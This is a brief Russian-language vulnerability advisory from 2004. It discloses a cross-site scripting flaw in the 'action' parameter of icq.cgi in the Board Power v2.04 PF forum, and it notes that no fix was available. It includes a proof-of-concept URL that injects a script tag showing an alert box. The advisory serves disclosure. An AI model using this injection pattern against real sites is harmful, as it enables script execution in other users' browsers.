Security Lab

Межсайтовый скриптинг в Board Power форуме

Дата публикации:04.07.2004
Всего просмотров:1379
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Board Power v2.04 PF

Описание: Уязвимость в скрипте icq.cgi в форуме Board Power v2.04 PF в поле "action" позволяет удаленному пользователю выполнить XSS нападение.

Эксплоит:

http://target/cgi-bin/boardpower/icq.cgi?action=<script>javascript:alert('hello');</script>

URL производителя: http://www.thewebmasterforums.com

Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время.

Уязвимость обнаружил Иван Жданов, dokk21@rambler.ru